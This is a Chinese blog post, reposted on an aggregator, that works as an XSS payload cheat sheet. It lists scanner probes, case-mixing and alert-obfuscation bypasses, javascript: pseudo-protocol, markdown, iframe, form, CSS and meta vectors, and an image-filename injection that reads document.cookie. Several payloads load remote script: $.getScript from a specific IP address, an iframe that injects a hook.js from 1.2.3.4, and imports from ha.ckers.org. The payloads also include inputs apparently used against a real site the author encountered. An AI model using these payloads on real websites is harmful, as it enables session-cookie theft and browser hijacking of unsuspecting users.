美文网首页
XSS payload

XSS payload

作者: 违规昵称不予展示 | 来源:发表于2020-08-19 19:17 被阅读0次

xss在线靶场 http://prompt.ml/0 https://xss-game.appspot.com/

这个是AWVS扫描器的payload

+e%27%22%28%29%26%25%3Cacx%3E%3CScRiPt+%3Ealert%281%29%3C%2FScRiPt%3E

1<%div style=width:expression(ZnRe(9043))> 记得把%删掉
 解码如下:
 e'"()&%<acx><ScRiPt >alert(1)</ScRiPt>
"/>e'"()&%<acx><ScRiPt >alert(1)</ScRiPt>  用单引号触发网站原本的双引号来进行闭合

http://www.xxx.com.cn/cn/(Z('%20onerror=alert%601%60%20'2222'%20))/Default.aspx
http://www.xxxx.com.cn/cn/(Z(' onerror=alert`1` '2222' ))/Default.aspx
http://www.sxxxx.com.cn/cn/(Z(' onerror=alert`1` '))/Default.aspx

这是我遇到的一个网站

<iframe src=https://baidu.com width=1366 height=768></iframe>
<iframe src=https://baidu.com width=1366 height=768
<details ontoggle="$.getScript`https://cdn.ampproject.org/rtv/012008102328000/amp4ads-v0.js`"
<details ontoggle="$.getScript`http://47.100.79.239/Test/JS.js`"
<image src="http://47.100.79.239/Test/JS.js>
<image src="http://300.jumpw.com/defaults/images/logo.png">

常用

  • <script>alert(/xss/)</script>
  • <svg onload=alert(document.domain)>
  • <img src=document.domain onerror=alert(document.domain)>
  • <M onmouseover=alert(document.domain)>M
  • <marquee onscroll=alert(document.domain)>
  • <a href=javascript:alert(document.domain)>M</a>
  • <body onload=alert(document.domain)>
  • <details open ontoggle=alert(document.domain)>
  • <embed src=javascript:alert(document.domain)>

大小写绕过

  • <script>alert(1)</script>
  • <sCrIpT>alert(1)</sCrIpT>
  • <ScRiPt>alert(1)</ScRiPt>
  • <sCrIpT>alert(1)</ScRiPt>
  • <ScRiPt>alert(1)</sCrIpT>
  • <img src=1 onerror=alert(1)>
  • <iMg src=1 oNeRrOr=alert(1)>
  • <ImG src=1 OnErRoR=alert(1)>
  • <img src=1 onerror="alert(&quot;M&quot;)">
  • <marquee onscroll=alert(1)>
  • <mArQuEe OnScRoLl=alert(1)>
  • <MaRqUeE oNsCrOlL=alert(1)>

各种alert

  • <script>alert(1)</script>
  • <script>confirm(1)</script>
  • <script>prompt(1)</script>
  • <script>alert('1')</script>
  • <script>alert("1")</script>
<script>alert`1`</script>
  • <script>(alert)(1)</script>
  • <script>a=alert,a(1)</script>
  • <script>[1].find(alert)</script>
  • <script>top["al"+"ert"](1)</script>
  • <script>top["a"+"l"+"e"+"r"+"t"](1)</script>
  • <script>top[/al/.source+/ert/.source](1)</script>
  • <script>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</script>

伪协议

  • <a href=javascript:/0/,alert(%22M%22)>M</a>
  • <a href=javascript:/00/,alert(%22M%22)>M</a>
  • <a href=javascript:/000/,alert(%22M%22)>M</a>
  • <a href=javascript:/M/,alert(%22M%22)>M</a>

Chrome XSS auditor bypass

  • ?param=https://&param=@z.exeye.io/import%20rel=import%3E
  • <base href=javascript:/M/><a href=,alert(1)>M</a>
  • <base href=javascript:/M/><iframe src=,alert(1)></iframe>

长度限制 

<script>s+="l"</script>
\...
<script>eval(s)</script></pre>

jquery sourceMappingURL

</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>

图片名

"><img src=x onerror=alert(document.cookie)>.gif

过期的payload

  • src=javascript:alert基本不可以用
  • css expression特性只在旧版本ie可用

css 

<div style="background-image:url(javascript:alert(/xss/))">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></pre>

markdown 

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)</pre>

iframe 

<iframe onload='
    var sc   = document.createElement("scr" + "ipt");
    sc.type  = "text/javascr" + "ipt";
    sc.src   = "http://1.2.3.4/js/hook.js";
    document.body.appendChild(sc);
    '
/>
  • <iframe src=javascript:alert(1)></iframe>
  • <iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
  • <iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
  • <iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
  • <iframe src=https://baidu.com width=1366 height=768></iframe>
  • <iframe src=javascript:alert(1) width=1366 height=768></iframe

form

  • <form action=javascript:alert(1)><input type=submit>
  • <form><button formaction=javascript:alert(1)>M
  • <form><input formaction=javascript:alert(1) type=submit value=M>
  • <form><input formaction=javascript:alert(1) type=image value=M>
  • <form><input formaction=javascript:alert(1) type=image src=1>

meta

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

其他一些奇怪的标签

河南<video data-automation="FootageHero_heroVideo_video" loop="" autoplay="" class="u_c_8bdc3"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.webm" type="video/webm"><source src="https://ak.picdn.net/footage/assets/directors_choice/footage-carousel-stock-videos.mp4" type="video/mp4"></video>


image.png

https://www.cnblogs.com/hookjoy/p/6181350.html

相关文章

网友评论

      本文标题:XSS payload

      本文链接:https://www.haomeiwen.com/subject/zksnrktx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|XSS payload|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!